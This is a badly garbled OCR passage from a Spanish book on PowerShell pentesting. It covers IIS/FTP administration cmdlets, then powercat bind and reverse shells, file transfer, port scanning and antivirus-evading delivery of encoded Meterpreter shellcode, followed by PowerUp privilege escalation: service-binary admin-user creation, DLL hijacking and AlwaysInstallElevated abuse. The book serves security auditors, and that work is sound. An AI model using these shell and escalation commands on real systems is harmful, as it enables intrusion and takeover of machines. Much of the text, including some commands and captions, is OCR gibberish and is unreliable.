23:43:27  >  Ne*-U°kPtpSite  Nane  pabloPTP  -Port  21  -PhysicalPath  C:\lnetpub\uww  -HostHeader  rtyPT 

Mane  *  ® 

State 

Physical  Path 

Bindings 

pabloPTP  3 

Started 

C:\inetpub\wwu 

ftp  127.0.0.1 :21:nyPTP 

PS  CtNlnotpub  04/ 26/2012  23:44: 

:50  >  Get-Ucbsite 

Mane  2® 

aState 

Physical  Path 

Bindings 

Default  Heb  Site  1 

164 

pahloFTP 

Stopped 

Started 

Started 

xSys t enDr ive 2 \i» o t pubSuwwrno t 

C:\inetpub\testi64 

C:\inotpub\wuw 

http  m:80: 

http  »:80:testlG4 

ftp  127.0.0.1 :21 :nyPTP 

Fig.  2.39:  Creation  de  un  sitio  FTP  en  Powershell. 


El  backup  es  uno  de  los  procesos  mas  costoso  y  delicado  al  que  se  enfrenta  un  administrador  en  su 
dia  a  dia.  El  modulo  de  11S  en  Powershell  dispone  de  un  cmdlet  para  rcalizar  el  proceso  de  copia  de 
seguridad  de  la  configuracion  del  servidor.  Fs  realmente  sencillo  llevar  a  eabo  dicho  proceso  ya  que 
con  la  simple  ejecucion  del  cmdlet  hackup-webconfignration  se  produce  la  copia  de  seguridad  de  la 
configuracion  del  servidor. 


PS  C:\inetpub  04/27/2012  00:11:35 

>  Backup-WebConf iguration 

end  let  Backup-UebConf  igui-ation  en  la  posicion  1  de  la  canalization  de  conandos 
Proporcione  ualores  para  los  paranetros  siguientes: 

<  Esc  riba  !?  para  obtener  A»/uda>. 

Name :  i64 

Nane 

Creation  Date 

164 

27/04/2012  0:00:00 

PS  C:\inetpub  04/27/2012  00:14:45 

>  Get-UebConf igurat ion Backup 

Nane 

Creation  Date 

164 

27/04/2012  0:00:00 

Fig.  3.40:  Creadon  del  backup  de  la  configurat  ion  de  un  sitio  weh 


on  cl  cmdlet  get-webconfigurationbackup  sc  listan  los  distintos  archivos  de  copia  dc  seguridad  de 
a  configuracion  de  los  sitios  web.  El  cmdlet  remove-webconfigurationbackup  elimina  las  copias  de 
*t!uridad  realizadas  previamente  sobre  el  servidor. 
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Capftulo  III 

PowerShell  puro:  El  arte  del  pentesting 


1.  Introduction 

Desde  hace  unos  afios  PowerShell  viene  en  las  versiones  de  Microsoft  Windows  y  cada  vez  ofrece 
mas  posibilidades  para  poder  interactuar  eon  todo  el  sistema.  ya  sea  cliente  o  servidor.  Poco  a 
poco  han  ido  apareciendo  herramientas  que  intcractuando  con  los  modulos  que  Microsoft  ha  ido 
desarrollando  sobre  directorio  activo.  SQL  Server.  Sharepoint.  IIS.  etcetera,  pueden  ayudar  a  los 
pentesters  en  una  audiloria.  La  fuerza  de  PowerShell  es  que  esla  basado  en  .NET.  por  lo  que  none 
todo  el  potencial  del  framework  al  alcance  de  la  consola.  Ademas.  ser  una  consola  de  objetos  le  da 
una  fuerza  importante  a  PowerShell. 

Durante  los  ultimos  atios  se  han  ido  desarrollando  diversos  scripts,  incluso  algunos  frameworks. 
orientados  a  la  audiloria.  Las  herramientas  estan  desarrolladas  para  dar  soluciones  en  diversas 
tematieas  eomo  es  la  respuesta  ante  ineidentes.  la  lase  de  post -ex plot  uc  ion  de  un  pettiest,  evasion 
de  elementos  de  seguridad  como  puede  ser  un  antivirus,  la  lase  de  recopilacion  de  informacion. 
orientadas  a  la  escalada  de  privilegio  en  la  lase  de  exploiacion.  etcetera.  A  continuacidn.  se  enumcran 
algunos  de  los  frameworks  y  herramientas  mas  eonocidas  y  utilizadas: 

-  La  navaja  suiza  traducida  y  mejorada  a  PowerShell  denominada  powerccit. 

-  PowerTools  es  una  parte  del  fanioso  framework  Veil-Framework.  Con  e.ste  eonjunto  de 
herramientas  se  podra  llevar  a  cabo  chequeos  de  eonfiguraciones  erroneas  en  maquinas  y 
realizar  escaladas  de  privilegio.  Ademas,  permite  recopilar  gran  cantidad  de  informacion 
sobre  los  dominios  Microsoft,  usuarios.  equipos,  recursos  compartidos.  etcetera. 

-  Posh-Sec Mod.  Este  eonjunto  de  scripts  desarrollados  por  Carlos  Perez  proporcionan 
funcionalidades  para  recopilar  informacion.  automatizacion  de  escaneres  como  Nessus. 
funcionalidades  de  post-ex  plot acion.  funciones  para  auditar  el  sistema.  funciones  para 
interactuar  con  la  API  de  VirusTotuL  Shndan  o  Metasploit. 

PowerSploit.  Est  c  framework  dispone  de  scripts  para  llevar  a  cabo  ejecucidn  dc  cod  ism 
sobre  maquinas  Windows,  recopilacion  dc  informacion.  bypass  de  AV.  modificacion  dc 
scripts,  generar  persistencia.  realizar  escaneos  de  red,  etcetera. 

-  Nishang.  Este  framework  proporciona  scripts  para  interactuar  con  backdoors  a  traves 
dc  PowerShell.  ejecucidn  de  codigo.  funcionalidades  para  realizar  escaladas  de  privilegio. 
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recoleccion  de  informacion.  realizacion  dc  escaneos  de  puertos,  realizar  luerza  bruia. 
pivoting .  etcetera. 

-  Oiras  herramientas.  Cada  vez  son  mas  las  herramientas  creadas  para  eje, :u  arse  en 
PowerShell  En  este  capitulo  se  podran  estudiar  una  gran  cant.dad  de  ellas. 
ayudaran  al  pen  tester  a  lograr  el  exito  en  entomos  Microsoft. 

Ademas  el  framework  de  explotacion  Metasploit  tiene  algunos  modulos  que  permiten  apoyarse 
llevar  ,  cl  la  fta  dc  p^caaon.  ES,c  hccho  ha  .mpulsado  cl  cx„o  d. 

PowerShell  entre  pentesters. 

Por  ultimo  el  penlester  tiene  que  tener  en  cuenta  que  en  los  entomos  Microsoft  todo  puede  ser 
realizado  a  travds  de  />-■*».  y  cue  el  ridigo  ejcculade  en  la  consol,  pasava  mas  dcsaperahido. 

pudiendo  llevar  a  eabo  la  evasion  de  AV. 

En  algunos  cases,  el  penmvr  no  con, art  con  henamicnm  m  podcr  utiliaar.  no  pod, a  lencr  an 
nmap.  safari  o  una  foca.  pero  casi  siempre  tendra  d.spomble  la  PowerShell. 


2.  Powercat:  la  navaja  suiza 

L  i  herramienta  netcat  es  una  de  las  mas  utilizadas  en  el  mundo  del  hacking,  ya  que  tiene  una  gran 
ver^t  d  d  0  xibilidad.  Entre  las  numerosas  eosas  que  se  pueden  llevar  a  eabo  eon  la  herrannenta 
e  muc^n  eomo  eiemplo  la  postbilidad  de  eoneetar  con  diversos  servidores.  asoc.ar  una  shell  o 
cnZZ^o  coaZo  o  colocarse  a  la  eseueha  para  reeibir  eonexiones  y  ses.ones • 
utilizarse  para  realizar  operaciones  de  depuracion  de  aplicaciones  de  red,  aunque ^v.endolo  de.de 
punto  de  vista  nuts  oscuro.  podria  ser  utilizado  para  abrir  puertas  traseras  o  hackdoon. 

A  continuacion  se  muestran  diversos  parametros  que  son  utilizados  en  netcat: 


Parametro 


-/ 


-P 


-a 


-k 


-v 


Descripcion _ . 

Neteal  se  coloca  a  la  escuclia.  Recibira  una  conexion  y  se  eerrara.  El  puerto  a 

abrir  sc  especificara  con  el  parametro  -p  _ _ 

“Espeeifica  el  puerto  en  el  que  se  pondra  a  la  eseueha,  o  sobre  el  que  se  realizara 
la  conexion  remota.  dependiendo  de  si  netcat  sc  utihza  para  geneiar  una 

conexion  o  para  recibirla  _  — - - 

Cl  puerto  se  abre  en  UDP  y  no  en  TC  P _ — 

Se  utiliza  con  el  parametro  ly-py  hace  que  no  se  cierre  el  puerto  tras  una 

conexion,  por  lo  que  permanece  abierio _ _ _ ■ — 

Modo  verbose 


Tabiu  3.01  *  Algunos  parametros  de  netcat. 
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Powercat  es  un  script  que  implementa  las  funcionalidades  de  netcat .  incluso  aumcntandolas.  HI 
script  presenta  una  funcion  denominada  powercat ,  la  cual  puede  reeibir  distintos  parametros  con 
funcionalidades  identicas  a  las  de  netcat.  Para  obtenerlo  se  puede  descargar  de  la  siguiente  direction 
URL  https://github . com/besinwrhino/powercat. 

•Que  se  puede  hacer  con  powercat ?  La  realidad  es  que  ei  numero  de  parametros  de  powercat  respecto 
a  netcat  es  mayor,  por  lo  que  a  priori,  se  pueden  realizar  mas  acciones.  A  netcat  se  le  denomina  la 
navaja  suiza,  pero  powercat  aumenta  las  funcionalidades  de  esta.  Con  powercat  se  puede  realizar 
una  conexion  en  modo  cliente  a  un  servidor  remote,  o  por  otro  lado  crear  un  listener .  es  decir. 
colocarse  en  modo  servidor  y  esperar  eonexiones.  Estas  acciones  son  identicas  a  las  eonexiones 
basicas  que  se  pueden  llevar  a  eabo  con  netcat. 

Powercat  permite  enviar  y  servir  shells.  Es  decir,  el  usuario  puede  dejar  powercat  a  la  eseueha  y 
cuando  se  reciba  una  conexion  servir  una  shell ,  o  por  el  contrario  realizar  una  conexion  contra  otro 
netcat  o  powercat  remoto  y  enviar  una  shell,  incluso  una  PowerShell. 

Powercat  permite  realizar  subida  y  descarga  de  ficheros  contra  otro  powercat.  Ademas.  se  permite 
cl  envfo  de  datos  a  traves  de  UDP  y  DNS.  Otra  funcionalidad  intcrcsante  que  proporciona  es  la 
posibilidad  de  hacer  relay,  incluso  relay  entre  eonexiones  de  diferentes  protocolos.  Por  ultimo,  se 
tiene  que  tener  en  cuenta  que  esta  magnifies  herramienta  permite  realizar  un  escaneo  basico  de 
puertos  TCP.  A  continuacion  sc  muestran  los  distintos  parametros  de  powercat: 


Parametro 

Descripcion 

-/ 

Se  deja  el  script  a  la  eseueha  dc  eonexiones 

-c 

Se  utiliza  para  realizar  eonexiones  en  modo  cliente  desde powercat 

-P 

Se  especifica  cl  puerto,  tanto  para  la  eseueha  de  eonexiones  como  para  conectar 

con  un  servidor  remoto 

-e 

Ejecuta  el  comando  que  se  indique  a  continuacion 

-ep 

Ejecuta  una  PowerShell 

-r 

Relay ,  cuyo  formato  es  —r  tep: ip: puerto 

-u 

Trafico  bajo  el  protoeolo  UDP 

-i 

Ruta  al  fichero  de  entrada.  puede  utilizarse  en  la  transferencia  de  archivos  entre 

dos  scripts  de  powercat 

-Of 

Indica  la  ruia  al  fichero  de  salida,  puede  utilizarse  para  indicar  la  ruta  donde  se 
escribira  el  fichero  en  una  subida 

-dns 

Transferencia  de  trafico  sobre  protoeolo  UDP  ( dnscat2 ) 

- rep 

Repeticion  del  proceso,  evitando  que  se  cierre  el  puerto 
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Parametro 

nescripcion 

-a 

Genera  un  payload 

5 

-ge 

Genera  nn  payload  eneodeado _ _ _ 

Como  se  puede  visualize  polecat  presents  varios  parametros  mas  que  netcat  por  detecto. 
ampliando  las  func tonal idades  de  fete,  y  simplificando  algunas  acc.on  . . 


CoZl«  se  JL  cse,  u„,  —  ,» 

Cuando el ,mou, I„  .««*»■  En  el  ease  de  ,ne  * 

. — 

■ry  />■ 


|  C:S»..~SPi,.n..-iS13ir«oi.Spo.eeo,.-..s.«e>  , npoe.-H.aule 

■>'  s;;“XS;.?>Lihi;«°|.Sn»d5S»  t, 

Internet  pueden  ser  utiles.  pe»  pz\ne- ktop\pouercat-naster\pouercat  .p.»l 
i.  Desea  ejecutar  ^U|ers\pgo  [U  ^Suspender  I?  3  fiy«da 

“ 5‘  ‘K 

ac l_tcp 
cowsay++ 

metasploit  > 

\  ji  — * 

\  (oo) - 

< _ >  >\ 

M— 8!  *  ^n({  search  your  hosts  and  services 

srswaar^  SS’-536'^  11  *~ 

■-1  '“!' si*£jr*M 

_ =[  325^pay?oads  -  32  encoders  -  8  nops 

sf 00  0O> 


12 


,-ig.  3.01:  Conexion  a  Metasplolt  a  troves  del  ciiente powercat. 
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Dar  y  recibir  shells 

Una  de  las  funcionalidades  mas  interesantes  de  powercat  es  poder  recibir  shells  o  cnviarlas  hacia 
el  otro  extremo.  Para  poder  servir  una  shell  se  puede  ulilizar  la  instruccion  powercat  -l-p  <puerto 
*’  elciuese  escucha>  -e  cmd.exe.  De  csta  forma,  cuando  el  usuario  se  conecte  al  puerto  indicado 
y  la  direecion  IP  donde  se  sirve  la  cmd.exe ,  se  podra  ejecutar  comandos  remotos.  Por  otro  lado. 
con  la  misma  instruccion.  cambiando  el  parametro  —e,  cl  cual  es  generico.  por  el  parametro  en 
el  cual  permitc  servir  una  PowerShell .  se  podria  obtener  un  control  mas  potente  de  la  maquina  La 
instruccion  a  ejecutar  es  powercat  -/  p  <puerto  en  el  que  se  escucha  las  peticiones>  -ep. 

rootfakaU;  *  nc  192. ibB  56.101  - - 

Windows  PowerShell 

Copyright  (C)  2013  Microsoft  Corporation.  All  rights  reserved. 

*  ^ ‘ \Users\pgonzalez\Desktop\powercat-master>  whoami 
i.lpaths\pablo  .gonzalez 

C • \U?grs\pqQnzalez\Desktop\powercat-master>  B _ _ 

Fig.  3.02:  (  unexion  a  una  powercat  a  la  escucha  que  sieve  una  PowerShell. 

,  ( onto  enviar  una  shell  o  PowerShell  a  un  servidor?  Esta  seria  !a  accion  inversa  a  la  estudiada 
anteriomiente.  En  este  caso.  la  instruccion  a  ejecutar  es  powercat  -c  <direccion  JP  remoUO  -/> 

■  ptterto  en  el  que  escucha  el  equipo  remoto>  /  -e  cmd.exe  |  -ep  J.  Donde  e  y  -ep  son  opcionales. 
Ln  este  ejemplo,  sc  parte  que  una  maquina  Linux  tiene  la  siguientc  instruccion  ejecutada  m  -/  -/' 
mil.  y  desde  Windows  el  usuario  envia  la  PowerShell  hacia  cl  servidor  a  la  escucha. 


Ps  C : Misers \pgon2alez\ftes ktop\po we rcat -master^  Inport -Module  .\powercat .psl 
Advertencia  de  seguridad 

Ejecute  solo  los  scripts  de  confianza.  Los  archivos  procedentes  dP 

ik-  £io!Se,'s^3onza}ezS'®es,<toP'sp°‘''ercat-naster> 
p:^sel's^P9onzalez^Desktop\pouercat-naster> 

,.‘VH00  -e^  P3°nZa  eSkt0pS'POUei'Cat"naSter>  powercat  “C  192.168.56.102  - 

"  - 


riff.  3.03.  Eii via  df  urn,  PowerShell  a  una  mdipdtm  Unux  a  la  escucha  can  netcat. 


Transferencia  de  archivos 

PZ7::rrrm  13  P0S!bi,idad  de  realizar  lransfcrcncias  *  archivos  emre  dos  sistemas.  Uno 
«  puede  cSt^r  y  °tr  e  SC,A  ,d0n  Para  cnviar  un  fichero  dcsdc  im  equipo  a  .raves  de  powercat 
ncucha  J  ■  SI8U,ente  ,nstrucclon PO'wcw <chreccioii  IP remota>  -p  <puerto  en  el  que 
ll  escucha  Zw’"  ,V"T0>  '  <n"U  local  de,fichero  11  enviar>.  De  este  modo  cl  sistema  que  este  a 

'•walizarse  J!mpla  8  traves  dc  Powercat  o  netcat  recibira  cl  eontenido  del  Hcliero  como  puede 
en  ia  imagem  r 

r.  olrcl  ^i_i:  #  nc  -l  -p  yooo 
texto  del  fichero  enviado! 
jowercat  ?1 _ _ 

hig.  j.04:  Envio  del  contenidn  de  un  fichero  a  /raves  de  powercat. 
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Para  la  reception  de  un  fichero  sc  puede  i  modo.  si  a 

extension  indicada  en  el  parametro  -of. 

Escanear  puertos  1  CP  con  Powercat  .  g  a  traves  del  parametro  - 

Con  powercat  se  puede  realizar  un  escaneo  basico  t  e  P^  °s>)  |  %  {powercat  -c  <direcci6n  IP 


■  i  \DesktopNpo»ei,cat-nastet*>  <80>  i  a  <po«e«-cat  c  192. 

s^:^r-rr-taie^^sep-§> 

FT ALLA DO :  Set  Stream  1 :  TCP 
ETALLADO:  Set  Stream  2:  Co"s°le 
ETftLLADO:  Setting  up  Stream  1--- 

fTTSi»::  Connect  ion"  to  192.168.56.102:80  ttcpl  succeeeded. 

“frflLLftDO-  -d‘ (disconnect >dflctiwated.  Disconnecting... 

S&&2  Strean_l 


Msic° ai  puer,n  *° de  ,ma 


maquina  ivmata  con  powercat. 


p  r.  ne,c..r„a  v  eiecucion  de  Shellcodes  desde  Powercat 

Ed  cs.e  escenario  so  cueman  con  las  **« 

maquinas:  „encrar  la  shellcode  encodeada. 

.  Maquina  Kali  Um  con  Social  Lag, nearing  Ml  P"»  * 

.  Maquina  M.  *  «  b  <**  -  «"«•  3 

mS ,/  on que  r P—  -  -  >— *  *  °W* 

el  fichero  de  la  maquina  Windows  8. 

Una  vez  el  pen, ester  obtiene  el  contenido  del  Achat*  ^^^mndo^TlZ  ejecutar  e» 
Teas  cl  breve  resuracn  de  1.  pruvba  de  concept  se  »a  a  deullar 

uenerar  el  fichero  con  Social  Engineering  Toolkit  sc  instruCci6n  con  la  siguiente  foj» 

S,"  caso  la  maquina  »■  &  E,  paramelro  »„>.»£ 


f  apitnlo  Hf  PowerShell  puro:  El  arte  de! pentesting 


visible  o  no.  El  parametro  noni  indica  que  sera  una  ejecucion  no  inleractiva.  Y  por  ultimo  el 
parametro  -enc  indica  el  codigo  a  ejecutar  encodeado. 


\Users\pgonzale2\DesKtop\powei*cat— masters  i mport-nodiile  .Npowercat -psl 


I 


dvertencia  de  seguridad 
jecute  solo  los  scripts  de  confianza.  Los  archivos 
rocedentes  de  Internet  pueden  ser  utiles,  pero  algunos 
rchiuos  podnan  danar  su  equipo.  cDesea  ejecutar 

%S^P£f°?Za^e?i?eS^toi)>spowercat“riastei'xPowe*,cat  -  psl7 
I??  CZ]  £Jecutar  «na  vez  IU]  Suspended 

[?]  Ayuda<el  valor  predeterninado  es  Z 

PS  C:\Users\pgonzalez\Desktop\po we rcat-master>  powercat  -1  -r»  •  n-vn 

ers\pgonzalez\Desktop\shellcode.txt  -rep  P  1Cat  1  P  9000  -i  C:\Us 

PS  C:\Users\pgonzalez\Desktop\powercat-master>  powercat  -1  -n  9 am  -i  r-vii 

rs\pgonzalez\Desktop\shellcode.txt  -rep  P  1  C’sUs 

S  C:\Users\pgonzalez\Desktop\powercat-naster>  powercat  -1  -p  9000  -i  r-vii^ 

ers\pgonzalez\Desktop\shellcode.txt  -rep  p  1  C-\Us 


Fig.  3  06:  Powercat  sirxv  un  fichero  con  to  insnucctdn  para  ejecutar  Meterpreter. 

l-ii  la  imagen  se  puede  visualizar  como  se  sirve  con  powercat  el  fichero  con  la  instruccion  y  la 
shellcode  en  su  interior.  La  instruccion  a  ejecutar  es  powercat  -/  -p  <puerlo  en  el  one  se  escucha 
■i  <nita  local  donde  se  encuentra  e/  fic/)em>. 

Desde  la  maquina  Windows  8. 1  el  pen, ester  puede  \axam powercat  para  crear  una  conexion  v  recibir 
el  contenido  del  fichero  remote.  Es  una  buena  forma  de  evadir  ciertos  clementos  de  seguridad 
eomo  podria  ser  un  antivirus.  Una  vez  se  obtiene  el  contenido  se  puede  almacenar  en  un  fichero  v 
posieriomiente  copiar  y  pegar  en  la  PowerShell. 


I  i!^«SBE5SSS!S£  SSrSf^’lriSSS^r.  sooo 


Fig.  J.f) 7  Obfetwidn  de  shellcode  creando  conexion  con  el  servidor. 

Scom.nrerlC.rnT  T'e  Cl‘and”  Se  reCibe  d  C0ntenid0  a  ,rav«  depowerca,.  el  codigo  encodeado 
un  U0S  dC  h"ea  d°nde  i,nlcs  no  exislian-  Por  «ta  razon.  se  recomienda  que  se  copie  en 

/  >  se  supriman  los  saltos  de  llnea,  quedando  una  sola  linea  del  codigo  encodeado. 

d'.h  in“ ",cci4n  “  «“ rom-rShall  se  erea  I,  conexion  inveraa  haeia  la  dircccibn 
Wpl  Wl  Engineering  Toolkit.  El  control  es  devuelto  a  traves  de  una  sesion  dc 

'  C|Uc  es  ejeeutado  en  la  maquina  con  Windows  8.J. 
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3.  Veil-Framework 


dia  esta  framework  tiene: 

'  Veil-Evasion.  Una  hcrramienia  que  pennile  generar  payloads  con  un  enloque  de  evasion 
de  antivirus,  utilizando  para  ello  diversas  tecnicas  y  lenguajes  de  programau  . 

-  Veil-Catapult.  Permite  trabajar  con  pay  load  de  tipo  psexec-style. 

-  Veil-Pillage.  Funcionalidades  panpost-explotacion. 

.  mxrttar.  Una  hem.mi.ma  an  PamrSMI  que  permit,  .scalar  y  obtencr 
informacion  cn  entornos  Windows. 

Pcde  anscar^e 

,-Wn- »'»«  c"  lib'°  “  bab  ara  En  “stT^mdo  se  hablara  d. 

ftmM  con  .1  fin  de  llevar  a  cabo  Ltoi  ,  navds  dr 

las  PowerTools,  centrandose  en  explicar  las  posibilidades  qtic  ofr  .  J  P 
pruebas  de  coneepto.  <,Que  elementos  componen  las  PowerTools^ 


Nonibre 


Descripcion 


PewPewPew 


Coniunto  de  scripts  que  contienen  secuencias  de  comandos.  los  cuales 
uSr  patron  coin,  con  el  fin  de  ejccmarlos  y  publican  resoltados  a 
traves  de  un  servidor  w  eb  - 


Lapitulo  III.  PowerShel!  piny:  /;/  arte  del  pentesting 
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Nonibre 

Descripcion 

Power  Pick 

Este  proyecto  tocahza  en  la  ejecucion  de  funcionalidades  de  PowerShel L 
sin  la  necesidad  de  utilizar  PowerShel/.  Utiliza  ensantblados  ..VAT  para 
ejecutar  scripts  de  PowerShel/ 

PowerUp 

Uerramiema  que  permite  realizar  esealadas  de  privilegio  en  sistemas 

It  mdows.  Contiene  varios  metodos  que  identifican  v  se  aprovechan  de 
servicios  vulnerables,  DLLs  que  permiten  aprovecharse,  configuraciones 
de  registro  vulnerables.  etcetera 

Power  View 

Herramienta  en  PowerShel/  que  permite  obtener  una  situacion  de  ventaja 

en  la  red  y  dominios  Windows.  Orientado  a  Active  Directoir 

ttihla  3.03:  Elementos  queforman  PowerTooh  de  Veil-I'mmemnk. 


Power  Up 

PowerUp  es  un  conjunto  de herramientas  de  PowerShel/ que  permite  realizar  esealadas  de  privilegios 
ui  sistemas  Microsoft  Windows  dcbido  a  malas  configuracioncs  o  dcbilidadcs.  Fsie  conjunto  de 
scripts  conttenen  vanos  metodos  para  identificar  y  aprovecharse  de  services  vulnerables  as i 
L-omo  realizar  DLL  Hijacking ,  detectar  configuracioncs  erroneas  cn  cl  registro  de  Window,  y  pode. 
local  i/a r  oportun.dades  de  esealada  en  el  sistema.  Dcsarrollado  por  (ahannjih-  y.  como  se  menciono 
anlcriormente.  forma  parte  de  Veil-Framework. 


En  PowerUp  se  pueden  encontrar  diferentes  categorias,  como  son 

-  Enumeracion  de  servicios  y  debilidades. 

-  Aprovechamiento  de  debilidades  en  servicios. 

-  DLI.  Hijacking. 

-  Chequeo  de  configuraciones  en  cl  registro. 

-  Helpers  y  otros. 


Cura  la  enumeracion  de  servicios  y  debilidades  se  disponen  de  varias  funciones. 
muestra  una  breve  descripcion  de  el  las: 


A  continuacion 


sc 


 Funcion 

Descripcion 

Get-Service  Unquoted 

Devuelve  el  listado  de  servicios  que  no  tienen  enlre  comil  las  los 

paths  donde  se  encuentra  el  binario 

Ge /-Sen  'ice  EXE  Penns 

Devuelve  el  listado  de  serv  icios  donde  el  actual  usuario  puede 
sobrescribir  la  mta  del  binario 

Get-ServicePerms 

Devuelve  el  listado  de  servicios  que  el  actual  usuario  puede 
modificar 

Tahta  3.04:  Funciones  para  /a  enumeracion  de  servicios  y  debilidades . 
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Eslas  «,  funciones  so,,  i™por, antes  para  ble, 

an  st,  instalacton.  La  funcion  Get-Sen-tceUrc,,^  penn la  n,u,  hasB 
encuentran  enlre  comillas.  por  lo  que  si  se  uease  un  suoomiase  que  se  tienc  un  servicio 

. .  .  r-v'L-p„,.„,.  nernliie  detectar  que  binarios  pueden  ser  sobrescritos  por  el 

La  tuncion  Get-SennceEX  kPti  ms  p  va  que  ya  sea  con  acceso 

:r:r":ac:^ 

sobrescribirlo.  por  lo  que  podria  obtener  pnvilegio. 

La  Itmcion  OWAnfcdVm.  pormite  detcca,  qoe 

““daC'r  “p—iePto'da  dabiBd.des  cn  Servians  sc  dispone 


de  varias  funciones. 

A  conti  nuacibn  se  muestra  una  breve  descripcion  de  ellas: 

Funcion _ 

Descnpcibn _ 

Invoke-ServiceUserAdd 

Modifica  un  servicio  modifieable  para  crear  un  usuario  y 
aftudirlo  al  grupo  de  administradores 

Write-  User  A  ddServiceB  inary 

Se  crea  un  binario  que  lanzara  un  servicio  y  anadna  un  usua¬ 

rio  perteneciente  al  grupo  administradores.  E  usuario  por 
defccto  es  Jlum  y  su  contrasena  Password! 23.'.  aunque  hay 
paramelros  para  cambiarlos 

Write-CMDSeniceBinary 

Sc  crea  un  binario  que  permile  ejecutar  un  comando  de  and 

personalizado  a  traves  de  la  creacion  de  un  service 

Write-Sen’iceEXE 

Reemplaza  el  binario  de  un  servicio  por  uno  que  anadc  un 
usuario  administrador  local  al  sistema  

Write -Sen  'ice  EXE  CMD 

Reemplaza  el  binario  de  un  service  con  uno  que  ejecuta  un 

comando  personalizado  _ 

Restore-Sen’iceEXE 

Restaura  un  binario  de  un  servicio  reemplazado  anteriormen 
te  por  el  binario  original  — 

Tablet  JM5:  funciones  para  e/  . 

e^" 
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Get-ServiceEXEPenns  y  GeiSenicePerms,  ya  que  eslas  permiten  saber  que  permisos  tienen  los 
bmarios  y  si  los  servicios  se  pueden  modificar. 

Para  realizar  DLL  Hijacking  existen  otras  funciones  en  Power  Up.  A  continuacion  se  muestra  una 
breve  descripcion  de  ellas: 


Funci6n 

Descripcion 

Invoke-FindDLLHijack 

Encuentra  oportunidades  para  realizar  hijacking  de  DLL  en  los 
distintos  procesos  que  se  cjecutan  en  la  maquina 

In  voke-FindPathHijack 

Encuentra  el  path  donde  se  puede  realizar  el  hijacking 

Tablet  J.06:  Pane  tunes  para  realizar  DLL  Hijacking. 


Las  aplicaciones  ulilizan  las  funciones  LoacILibnnyO  o  LoadLibraiyExQ  para  cargar  funciones 
adicionales  linkando  con  una  libreria  dinamica.  Cuando  no  se  especifica  su  ruta  completa  Windows 
decide  el  orden  de  busqueda  de  la  DLL ,  empezando  por  el  directorio  actual  del  proceso.  Entonccs. 
si  un  usuario  abre  un  fichero  medianle  una  aplicacion  vulnerable  a  DLL  Hijacking  y  en  el  mismo 
directorio  se  encuentra  una  DLL  maliciosa.  la  cual  ha  sido  renombrada  corao  la  original,  oiro  usuario 
puede  conseguir  la  ejecucion  de  codigo. 

Por  ejemplo,  si  una  aplicacion  que  carga  un  fichero  de  datos  cifrado  y  para  descifrarlo  necesita 
utilizar  una  DLL  externa,  la  cual  ha  sido  sustituida  por  otra  maliciosa,  se  podra  ejecular  eddigo 
cuando  la  aplicacion  cargue  la  nueva  DLL  para  poder  descifrar  el  fichero. 


Para  realizar  chequeos  de  configuraciones  en  el  registro  existen  otras  funciones.  A  continuacion  se 
muestra  una  breve  descripcion  de  ellas: 


Funcion 

Descripcion 

Get-RegA  IwayslnstallEIevated 

Esta  funcion  chequea  si  la  clave  de  registro  Always/nsta/IEIe- 

vated  se  encuentra  aeliva  o  no 

Get -  R egA  u to  Logon 

Esta  funcion  chequea  para  detectar  configuraciones  erroneas 

de  Autologon  en  el  registro 

Tahiti  3.07:  Funciones  para  tvalizur  el chequctt  c!v  configuraciones  en  el  registro. 


■a  tuncion  Get-RegAlwaysInstallElevated  chequea  si  en  las  ramas  HKLM  y  HKCU  del  reeistro  de 
imiows  esta  activo  o  no  AhvaysInstallELevated.  En  caso  de  estar  ambas  con  valor  de  I.  se  podria 
qecutar  un  instalador  MSI  con  codigo  arbitrario.  pudiendo  elevar  privilegio  o  realizar  acciones 
como  la  de  crear  un  usuario  administrador.  Si  esta  funcion  devuelve  true,  se  podra  utilizar  la  funcion 
Hte-UserAddMSl para  gencrarel  instalador  MSI  que  proporcione  una  aplicacion  que  permita  crear 
un  usuario  con  privilegios  cn  el  sistema. 

Lacategoria  de  helpers  que  proporciona  Power  Up  es  un  conjunto  de  scripts  basados  en  ayudar  con 
ormacion.  fitheios  o  acciones  a  las  demas  categorias  vistas  anteriormentc.  A  continuacion  se 
•ue.sira  una  breve  descripcion  de  ellos: 


120 


Pentesting  con  PowerSheU 


Funci6n 

Descripcion 

In  voke-A  II  Checks 

Proporciona  un  informe  eon  los  resultados  de  las  tunciones  de  escalada 
de  privileges  que  se  han  estudiado  en  este  apartado 

Write-  User  A  ddMSI 

Genera  un  paquete  MSI  que  proporciona  una  aplieacion  para  crear  un 
usuario  como  administrador  u  otro  grupo  de  usuario 

Invoke-ServiceStart 

Arranca  un  scrvicio  a  traves  del  nombre  dc  este.  Puede  ser  util  para 

cuando  se  utiiicen  funciones  de  generacion  de  binarios  para  sustituir  a 
los  binarios  de  servicios  legitimos 

In  voke-ServiceStop 

Detiene  un  servicio  a  traves  del  nombre  de  este 

Invoke-ServiceEnabI  e 

Habilita  un  servicio 

Invoke-ServiceDisable 

Deshabilita  un  servicio 

Get-ServiceDetciils 

Devuelve  informacion  detallada  acerca  de  un  servicio 

Tahiti  3M:  Funciones  Helpers  de  PowerUp. 


La  funcion  invoke- A  UChecks  proporciona  informacion  interesanic.  quiza  sea  una  de  las  pnmeras 
funciones  que  deberian  ejecutarse  para  eonocer  el  conlexto  en  el  que  se  mueve  e  pen  es  a  en  c 
equ  r?omo  se  puede  vLalizar  en  la  Imogen,  la  funcion  retorna  inform*:, on  sobre  la  pertenenem 
del  Sario  al  grupo  administradores  con  cl  fin  de  comprobar  un  posib.e  bypass  L  AC  los  scrvuj.os 
que  lienen  sus  rutas  cntre  comi.las,  los  permisos  de  los  binaries  de  los  servtctos.  los  %PATH% 
para  un  potencial  hijacking  de  DLL.  los  valorcs  de  la  clave  AlwaysinstaUElevaled.  etcetera.  Un  buen 
resumen  rapido  con  asesoramiento  en  la  propia  salida  del  script . 


PS  C : \Users\pgonzalez\Desktop\PowerTools-naster\PowerUp>  Inuoke-ftllChecks 

[*]  Running  Invoke-AllChecks 

it]  Userki"SinfaUlocalSgrSup  lhTt\ZZi  adnintstrat 

[:j  lZ  * Invoke-CbeckLocalfidroin^-Uerbose '^tc^determine  exact  nenbership. 

UseC'tWrite-UserftddServiceBinary*tor " ' Write -CMDServ iceBin ary'  to  abuse 

[*]  Unquoted  service  path:  Mobizen  plugin  -  C:\Progran  Files  <x86>sRSUPP0R 
T\MobizenServ ice\MobizenServ ice  - exe 

use 

[+]  Uulnerable  service  executable:  Mobizen  plugin  C-\Piogiam 
\RSUPPORT\MobizenServ ice\MobizenServ ice .exe 


